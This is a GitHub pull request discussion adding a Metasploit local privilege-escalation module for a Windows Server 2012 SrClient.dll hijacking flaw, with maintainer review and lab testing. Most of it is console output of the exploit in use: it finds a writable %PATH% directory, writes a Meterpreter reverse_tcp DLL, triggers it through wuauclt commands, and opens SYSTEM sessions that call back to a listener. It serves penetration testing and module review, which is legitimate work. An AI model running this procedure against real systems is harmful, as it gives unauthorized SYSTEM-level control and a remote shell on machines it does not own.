Skip to content

Add Window Server 2012 SrClient DLL Hijacking local exploit module and docs #14776

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 3 commits into from
Mar 15, 2021
Merged

Add Window Server 2012 SrClient DLL Hijacking local exploit module and docs #14776

merged 3 commits into from
Mar 15, 2021

Conversation

ErikWynter
Copy link
Contributor

About

This change adds a new local exploit module for a Windows Server 2012 DLL hijacking vulnerability that I recently discovered. This is a 0-day, but it won't be patched because it requires %PATH% to include directories that are writable by low-privileged users, and Microsoft won't patch %PATH% DLL Hijacking issues. That's why there is no CVE information, and there won't be.

A full write-up is available here
I also published two demo video:

Vulnerable Application

All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL hijacking due to the way TiWorker.exe will try to call the non-existent SrClient.dll file when Windows Update checks for updates. This issue can be leveraged for privilege escalation if %PATH% includes directories that are writable by low-privileged users. The attack can be triggered by any low-privileged user and does not require a system reboot.

This exploit has several limitations

  • The attack won't work when Windows Update is already checking for/downloading/installing updates on the target
  • The attack won't work twice in a row, at least not in quick succession (because the attack causes Windows Update to check for updates)

Windows Server 2012 VM images are available at the Microsoft Evaluation Center here.

Verification Steps

  1. Start msfconsole
  2. Do: use modules/exploit/windows/local/srclient_dll_hijacking
  3. Do: set SESSION [SESSION ID]
  4. Do: run

Options

WRITABLE_PATH_DIR

The full path to a writable %PATH% directory to write the payload to. If this is not set,
the module will enumerate the %PATH% directories and try to find one that is writable by the current user.

STEALTH_ONLY

If this is enabled, the module will only exploit the target if this is possible by triggering the payload via the
WUAUCLT /DetectNow command, which will launch Windows Update in the background.
This means that exploitation will not proceed if Windows Update is set to never check for updates on the target.

Scenarios

Windows 2012 x64 - %PATH% enumeration (default) with Verbose set to true

msf6 exploit(windows/local/srclient_dll_hijacking) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  3         meterpreter x64/windows  WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB  192.168.91.12:8443 -> 192.168.91.16:49157 (192.168.91.16)

msf6 exploit(windows/local/srclient_dll_hijacking) > show options 

Module options (exploit/windows/local/srclient_dll_hijacking):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   SESSION            3                yes       The session to run this module on.
   STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
   WRITABLE_PATH_DIR                   no        Path to a writable %PATH% directory to write the payload to.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.91.12    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Server 2012 (x64)


msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.91.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*] 
[*]     Everyone
[*]     BUILTIN\Users
[*]     NT AUTHORITY\INTERACTIVE
[*]     CONSOLE LOGON
[*]     NT AUTHORITY\Authenticated Users
[*]     NT AUTHORITY\This Organization
[*]     NT AUTHORITY\Local account
[*]     LOCAL
[*]     NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*]     Checking permissions for C:\Windows\system32
[*]     Checking permissions for C:\Windows
[*]     Checking permissions for C:\Windows\System32\Wbem
[*]     Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0\
[*]     Checking permissions for C:\wynter
[*] 
[+] WIN-FCDUOQDT1NB\wynter has write permissions to the following %PATH% directories:
[*] 
[*]     C:\wynter
[*] 
[+] The target appears to be vulnerable.
[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Sending stage (201283 bytes) to 192.168.91.16
[*] Meterpreter session 4 opened (192.168.91.12:4444 -> 192.168.91.16:49159) at 2021-02-16 08:59:24 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Windows 2012 x64 - WRITABLE_PATH_DIR option set, Verbose set to false

msf6 exploit(windows/local/srclient_dll_hijacking) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  8         meterpreter x64/windows  WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB  192.168.91.12:8443 -> 192.168.91.16:49158 (192.168.91.16)

msf6 exploit(windows/local/srclient_dll_hijacking) > show options 

Module options (exploit/windows/local/srclient_dll_hijacking):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   SESSION            8                yes       The session to run this module on.
   STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
   WRITABLE_PATH_DIR  c:\wynter        no        Path to a writable %PATH% directory to write the payload to.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.91.12    yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Server 2012 (x64)


msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.91.12:5555 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[+] WIN-FCDUOQDT1NB\wynter has write permissions to c:\wynter
[+] The target appears to be vulnerable.
[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
[!] Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.
[*] Trying to trigger the payload via the shell command `wuauclt /selfupdatemanaged`
[*] Sending stage (201283 bytes) to 192.168.91.16
[*] Meterpreter session 9 opened (192.168.91.12:5555 -> 192.168.91.16:49160) at 2021-02-16 09:12:28 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

@ErikWynter
Copy link
Contributor Author

ErikWynter commented Feb 19, 2021
edited
Loading

Notes:

  • Windows Server 2008R2, 2012R2, 2016 and 2019 are not vulnerable. I don't have access to Windows Server 2003 and 2008 VMs, so it could still be tested for those systems.
  • There might still be a better / more reliable way to trigger this bug, but I haven't found it.
  • Cleanup sometimes fails to delete SrClient.dll after spawning a session. I haven't been able to figure out why because it seems random. I tested this by reverting to the same snapshot multiple times and then run the exploit. The exploit always worked, but sometimes cleanup would fail and sometimes it wouldn't.
  • The %PATH% enumeration code could be used for additional modules exploiting similar vulnerabilities, like the NetMan vulnerability for which no module exists yet.
  • I successfully and extensively tested this on two different VMs for various patch levels, including fully patched. Despite that, I still can't wait for someone to verify the exploit and assure me that I am not crazy, or at least not THAT crazy.
  • My brain hurts. Time for sleep. See you all next week.

@bwatters-r7 bwatters-r7 self-assigned this Feb 19, 2021
@ErikWynter
Copy link
Contributor Author

In response to questions about reliability, to make this a safer exploit, it would also be possible to add an extra check to the module to see if TiWorker.exe is already running on the target, and not to exploit if this is the case. That should further decrease the odds of leaving a permanent backdoor (which is already not that likely if the module is used responsibly).

@ErikWynter
Copy link
Contributor Author

I just realized that the module currently enumerates through all %PATH% directories, instead of just those that are part of the system PATH. I will correct this as soon as I get the chance, though that might be only next week.

@bwatters-r7
Copy link
Contributor

Does the windows update have to hit the server? My 2012 server is on an isolated network, so it can't actually talk to the microsoft server, and this appears to fail:

msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-8AOTFCRKDQ0\msfuser...
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[+] WIN-8AOTFCRKDQ0\msfuser has write permissions to the following %PATH% directories:
[*] 
[*] 	C:\Users\msfuser
[*] 
[+] The target appears to be vulnerable.
[!] Failed to obtain the Windows Update setting.
[*] The module will launch the Windows Update window on the target in an attempt to trigger the payload.
[*] Writing 8704 bytes to C:\Users\msfuser\SrClient.dll...
[*] Trying to trigger the payload via the shell command `wuauclt /selfupdatemanaged`
[*] Exploit completed, but no session was created.

@ErikWynter
Copy link
Contributor Author

@bwatters-r7 I'm not sure, but it could be, because my test machine was able to reach the update server. It may also depend on the specific wuauclt command being used. You could try it with /selfupdateunmanaged and /detectnow instead. When trying it with /detectnow, make sure Windows Update is not set to never check for updates. I also wonder why it fails to obtain the Windows update setting for you, I never had this issue. Btw, were you running Process Monitor to check if the DLL was being called? Otherwise it could be that TiWorker.exe is actually trying to load SrClient.dll but that the payload doesn't connect back for another reason.

@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Feb 26, 2021
edited
Loading

OK; figured it out. I did not have a non-R2 2012 server in my range so I built one really quickly by hand. I'd forgotten that Microsoft did not turn on auto updates by default in the before times. When you install, the auto update is in a strange state- neither on nor off:
image
Once I made a selection, it works well. Before you make a selection, the value in the registry is nil, so it might not be a terrible idea to include that within the case statement.

msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-8AOTFCRKDQ0\msfuser...
[*] 
[*] 	Everyone
[*] 	BUILTIN\Users
[*] 	NT AUTHORITY\INTERACTIVE
[*] 	CONSOLE LOGON
[*] 	NT AUTHORITY\Authenticated Users
[*] 	NT AUTHORITY\This Organization
[*] 	LOCAL
[*] 	NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*] 	Checking permissions for C:\Windows\system32
[*] 	Checking permissions for C:\Windows
[*] 	Checking permissions for C:\Windows\System32\Wbem
[*] 	Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0
[*] 	Checking permissions for C:\Users\msfuser.WIN-8AOTFCRKDQ0
[*] 
[+] WIN-8AOTFCRKDQ0\msfuser has write permissions to the following %PATH% directories:
[*] 
[*] 	C:\Users\msfuser.WIN-8AOTFCRKDQ0
[*] 
[+] The target appears to be vulnerable.
[*] Writing 8704 bytes to C:\Users\msfuser.WIN-8AOTFCRKDQ0\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Sending stage (200262 bytes) to 192.168.134.140
[*] Meterpreter session 4 opened (192.168.135.197:4444 -> 192.168.134.140:49162) at 2021-02-26 10:54:44 -0600

meterpreter > sysinfo
Computer        : WIN-8AOTFCRKDQ0
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

@ErikWynter
Copy link
Contributor Author

Ah that's good to know @bwatters-r7 ! I will make sure to add a check for this. Just to confirm, when auto update is in this kind of nil state, none of the wuauclt commands work to trigger SrClient.dll?

@bwatters-r7
Copy link
Contributor

I am relatively sure I hardcoded both methods and attempted them. The default method (non-stealthy, I believe, because there was a pop-up for updating) breaks the updater and produces a consistent error code. It even gives the same error after a reboot when you try to start up the updater manually. I'll fire up my test machine and verify it all today.

@ErikWynter
Copy link
Contributor Author

Sounds good @bwatters-r7 ! The default method is indeed non-stealthy now, due to the STEALTH_ONLY option defaulting to false. I could reverse that if you prefer, so that it only uses the non-stealthy (pop-up) attack when the user explicitly allows this and the non-stealthy command won't work.

@bwatters-r7
Copy link
Contributor

I think the stealthy/nonstealthy is fine as-is. I've verified that in the default state, the registry key exists, but the value is nil. I went ahead and did a quick edit locally and added a when nil to the case statement, and it catches it in this state.
I can also verify that neither method works when the registry value is nil:

msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-8AOTFCRKDQ0\msfuser...
[*] 
[*] 	Everyone
[*] 	BUILTIN\Users
[*] 	NT AUTHORITY\INTERACTIVE
[*] 	CONSOLE LOGON
[*] 	NT AUTHORITY\Authenticated Users
[*] 	NT AUTHORITY\This Organization
[*] 	LOCAL
[*] 	NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*] 	Checking permissions for C:\Windows\system32
[*] 	Checking permissions for C:\Windows
[*] 	Checking permissions for C:\Windows\System32\Wbem
[*] 	Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0
[*] 	Checking permissions for C:\users\msfuser
[*] 
[+] WIN-8AOTFCRKDQ0\msfuser has write permissions to the following %PATH% directories:
[*] 
[*] 	C:\users\msfuser
[*] 
[+] The target appears to be vulnerable.
[!] Failed to obtain the Windows Update setting.
[*] update value = 
[*] The module will launch the Windows Update window on the target in an attempt to trigger the payload.
[*] Writing 8704 bytes to C:\users\msfuser\SrClient.dll...
[*] Trying to trigger the payload via the shell command `wuauclt /selfupdatemanaged`
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/srclient_dll_hijacking) > 
msf6 exploit(windows/local/srclient_dll_hijacking) > jobs -[*] 192.168.132.198 - Meterpreter session 1 closed.  Reason: Died
l
[*] Sending stage (200262 bytes) to 192.168.132.198
[*] Meterpreter session 2 opened (192.168.135.197:4567 -> 192.168.132.198:49158) at 2021-03-01 17:28:34 -0600


Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.135.197:4567

msf6 exploit(windows/local/srclient_dll_hijacking) > set session 2
session => 2
msf6 exploit(windows/local/srclient_dll_hijacking) > reload
[*] Reloading module...
msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-8AOTFCRKDQ0\msfuser...
[*] 
[*] 	Everyone
[*] 	BUILTIN\Users
[*] 	NT AUTHORITY\INTERACTIVE
[*] 	CONSOLE LOGON
[*] 	NT AUTHORITY\Authenticated Users
[*] 	NT AUTHORITY\This Organization
[*] 	LOCAL
[*] 	NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*] 	Checking permissions for C:\Windows\system32
[*] 	Checking permissions for C:\Windows
[*] 	Checking permissions for C:\Windows\System32\Wbem
[*] 	Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0
[*] 	Checking permissions for C:\users\msfuser
[*] 
[+] WIN-8AOTFCRKDQ0\msfuser has write permissions to the following %PATH% directories:
[*] 
[*] 	C:\users\msfuser
[*] 
[+] The target appears to be vulnerable.
[!] Windows Update is not set
[*] Writing 8704 bytes to C:\users\msfuser\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/srclient_dll_hijacking) >

@ErikWynter
Drop x86 target, add checks for Windows Update nil setting and for wh…
ab632b9 
…en TiWorker.exe is already running on the target
@ErikWynter
Copy link
Contributor Author

ErikWynter commented Mar 6, 2021
edited
Loading

Hi @bwatters-r7 I have incorporated all the suggested changes in the latest commit. In particular, I have made the following changes:

  • I removed the x86 target, removed the unnecessary arch checks, and added an explicit arch check for the payload, which I think should always be x64.
  • I added the nil value for the Windows Update status and moved this check to the check method.
  • I changed the method for obtaining the %PATH% variables to a reg query that returns only the SYSTEM %PATH% directories, since the current check also returned all other PATH directories if those were set, such as the user PATH.
  • I added a check to see if TiWorker.exe is running on the target. If so, the module will not proceed with exploitation because it never works (it seems at least). I added the WAIT_FOR_TIWORKER option to let users force the module to wait for TiWorker.exe to stop running and then try again.
sf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*] 
[*]     Everyone
[*]     BUILTIN\Users
[*]     NT AUTHORITY\INTERACTIVE
[*]     CONSOLE LOGON
[*]     NT AUTHORITY\Authenticated Users
[*]     NT AUTHORITY\This Organization
[*]     NT AUTHORITY\Local account
[*]     LOCAL
[*]     NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*]     Checking permissions for %SystemRoot%\system32
[*]     Checking permissions for %SystemRoot%
[*]     Checking permissions for %SystemRoot%\System32\Wbem
[*]     Checking permissions for %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
[*]     Checking permissions for C:\wynter
[*] 
[+] WIN-FCDUOQDT1NB\wynter has write permissions to the following %PATH% directories:
[*] 
[*]     C:\wynter
[*] 
[+] The target appears to be vulnerable.
[!] TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to 30 minute(s)...
[*] TiWorker.exe is still running on the target. The module will keep checking for 29 minute(s)...
[*] TiWorker.exe is still running on the target. The module will keep checking for 28 minute(s)...
[*] TiWorker.exe is still running on the target. The module will keep checking for 27 minute(s)...
[*] TiWorker.exe is still running on the target. The module will keep checking for 26 minute(s)...
[*] TiWorker.exe is still running on the target. The module will keep checking for 25 minute(s)...

Note about WAIT_FOR_TIWORKER: So far I haven't actually been able to re-exploit it in this manner because TiWorker.exe seems to be running for a reeeeally long period on my test system, but I'll try this a few more times and then let you know. I was able to manually re-exploit the same system multiple times by killing TiWorker.exe. While this didn't work every single time, my findings do indicate that setting a WAIT_FOR_TIWORKER value should make re-exploitation possible sometimes.

@bwatters-r7
Copy link
Contributor

@kalba-security Thanks for the updates! I'm in the middle of something else right now, but I'll pick this back up on Monday; I just wanted you to know I have not forgotten about this!

@ErikWynter
Copy link
Contributor Author

Sounds good, thanks for letting me know :)

@bwatters-r7
Copy link
Contributor

Before Windows Update is configured:

[*] Started reverse TCP handler on 192.168.135.197:4567 
[*] Sending stage (200262 bytes) to 192.168.132.198
[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.132.198:49158) at 2021-03-12 13:39:13 -0600

msf6 > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-8AOTFCRKDQ0
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-8AOTFCRKDQ0\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: This function is not supported on this system. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 > use exploit/windows/local/srclient_dll_hijacking 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/srclient_dll_hijacking) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf6 exploit(windows/local/srclient_dll_hijacking) > show options

Module options (exploit/windows/local/srclient_dll_hijacking):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   SESSION                             yes       The session to run this module on.
   STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
   WAIT_FOR_TIWORKER  0                no        No. of minutes to wait for TiWorker.exe to finish running if it is already active.
   WRITABLE_PATH_DIR                   no        Path to a writable %PATH% directory to write the payload to.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2012 (x64)


msf6 exploit(windows/local/srclient_dll_hijacking) > set session 1
session => 1
msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.

After enabling Windows Update and rebooting...

[*] Sending stage (200262 bytes) to 192.168.134.140
[*] Meterpreter session 3 opened (192.168.135.197:4567 -> 192.168.134.140:49157) at 2021-03-12 14:02:18 -0600

msf6 exploit(windows/local/srclient_dll_hijacking) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN-8AOTFCRKDQ0
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-8AOTFCRKDQ0\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: This function is not supported on this system. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 3...
msf6 exploit(windows/local/srclient_dll_hijacking) > run

[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/srclient_dll_hijacking) > set session 3
session => 3
msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-8AOTFCRKDQ0\msfuser...
[*] 
[*] 	Everyone
[*] 	BUILTIN\Users
[*] 	NT AUTHORITY\INTERACTIVE
[*] 	CONSOLE LOGON
[*] 	NT AUTHORITY\Authenticated Users
[*] 	NT AUTHORITY\This Organization
[*] 	LOCAL
[*] 	NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*] 	Checking permissions for %SystemRoot%\system32
[*] 	Checking permissions for %SystemRoot%
[*] 	Checking permissions for %SystemRoot%\System32\Wbem
[*] 	Checking permissions for %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
[*] 	Checking permissions for C:\users\msfuser
[*] 
[+] WIN-8AOTFCRKDQ0\msfuser has write permissions to the following %PATH% directories:
[*] 
[*] 	C:\users\msfuser
[*] 
[+] The target appears to be vulnerable.
[*] Writing 8704 bytes to C:\users\msfuser\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Sending stage (200262 bytes) to 192.168.134.140
[*] Meterpreter session 4 opened (192.168.135.197:4444 -> 192.168.134.140:49162) at 2021-03-12 14:02:47 -0600

meterpreter > sysinfo
Computer        : WIN-8AOTFCRKDQ0
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@ErikWynter
Copy link
Contributor Author

The latest commit removes that unnecessary comment and updates the documentation to mention the WAIT_FOR_TIWORKER option. Let me know if any further changes are needed :)

@bwatters-r7 bwatters-r7 merged commit ae5d31c into rapid7:master Mar 15, 2021
@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Mar 15, 2021
edited by pbarry-r7
Loading

Release Notes

New module exploits/windows/local/srclient_dll_hijacking achieves privilege escalation via a DLL hijacking vulnerability in Windows Server 2012 (relies on a user misconfiguration of the path environment variable).

@pbarry-r7 pbarry-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 17, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@ErikWynter @bwatters-r7 @bcoles @pbarry-r7